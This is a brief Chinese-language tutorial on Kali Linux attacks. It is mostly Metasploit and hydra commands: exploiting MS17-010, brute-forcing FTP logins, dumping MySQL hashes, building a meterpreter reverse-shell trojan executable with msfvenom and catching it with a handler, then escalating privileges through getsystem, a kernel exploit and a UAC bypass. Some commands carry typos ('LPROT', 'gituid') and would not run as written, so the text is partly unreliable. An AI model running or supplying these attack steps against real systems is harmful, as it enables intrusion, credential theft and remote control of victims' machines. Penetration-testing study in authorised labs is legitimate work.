linux 漏洞 msf,Kali Linux漏洞扫描、漏洞利用、MSF木马生成及权限提升篇

还是老样子,仅供有一定基础的朋友Kali Linux入门,毕竟这不是完整的详细教程,你不一定能看懂,但是原理是没任何问题的。以下都是一些简单的示例:其它的示例以此类推就可以了。

一、Kali Linux漏洞扫描

Web层面:Kali自带的owasp-zap、w3af

系统层面:Openvas、Nessus

二、Kali Linux漏洞利用

1、漏洞利用复现MS17-010测试

msf5 > use exploit/windows/smb/ms17_010_eternalblue

2、端口安全问题弱口令攻击

弱口令:FTP登陆

msf5 > use auxiliary/scanner/ftp/ftp_login

[email protected]:/# hydra -l user -P passlist.txt ftp://192.168.1.104

3、端口安全问题服务版本漏洞攻击

服务漏洞:MySQL 5.5.23

msf5 > use auxiliary/scanner/mysql/mysql_authbypass_hashdump

三、Kali Linux MSF木马反弹程序生成技术

第一步:

[email protected]:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.102 LPROT=888 -f exe -o fujieace.exe

第二步:

msf5 > use exploit/multi/handler

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

四、Kali Linux MSF权限提升

以下是以windows举例的,如果遇到Linux只需要选择相应的Linux模块即可!原理都是相同的。

第一种:自带的权限提升

meterpreter > gituid

meterpreter > getsystem

第二种:利用溢出漏洞提升

meterpreter > background

msf5 exploit(multi/handler) > use exploit/windows/local/ms11_080_afdjoinleaf

msf5 exploit(windows/local/ms11_080_afdjoinleaf) > set session 2

第三种:UAC权限提升

msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac

你可能感兴趣的:(linux,漏洞,msf)